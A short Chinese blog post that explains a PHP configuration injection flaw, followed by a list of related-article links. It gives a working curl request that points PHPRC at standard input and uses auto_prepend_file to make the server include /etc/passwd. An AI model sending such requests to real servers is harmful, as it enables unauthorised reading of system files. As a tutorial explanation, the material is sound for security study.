【网络安全】PHP配置注入漏洞

未经许可,不得转载。

文章目录

正文

前提:通过探测等方式发现某个 PHP 文件存在 PHPRC 参数:

bash 复制代码
curl "https://xxx.com/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'

PHPRC 用于指定 PHP 配置文件(php.ini)的路径。通过将其设置为 /dev/fd/0,我们尝试让服务器从标准输入读取 PHP 配置。

--data-binary 参数以二进制格式发送数据,适合传递原始数据而非标准表单参数。

auto_prepend_file 是 PHP 配置选项,可以在执行脚本前自动包含指定文件。这里我们设置为 /etc/passwd,试图读取系统敏感信息。

漏洞证明如下:

相关推荐
黄焖鸡能干四碗9 小时前
网络安全建设实施方案(Word文件参考下载)
大数据·网络·人工智能·安全·web安全·制造
2401_8442213216 小时前
深入理解K8s中的应用服务:访问、集群与配置
容器·kubernetes·php
Chockmans17 小时前
春秋云境CVE-2021-46436
web安全·网络安全·春秋云境·cve-2021-46436
xiangpanf18 小时前
PHP vs Python:30字看透两大语言差异
开发语言·php
新猿一马18 小时前
服务端安全开发注意事项
数据库·web安全·oracle
Kapibalapikapi19 小时前
Web笔记 | URL跳转漏洞(开放重定向)
安全·web安全
xixixi7777719 小时前
从SQL注入到XSS:实战Web安全渗透测试
人工智能·安全·web安全·网络安全·卫星通信
xiangpanf19 小时前
PHP爬虫框架:Goutte vs Panther
开发语言·c++·vue.js·php
常利兵21 小时前
从0到1:搭建Spring Boot 3企业级认证授权平台
数据库·spring boot·php
鹅天帝21 小时前
20230319网安学习日志——XSS漏洞
前端·学习·web安全·网络安全·xss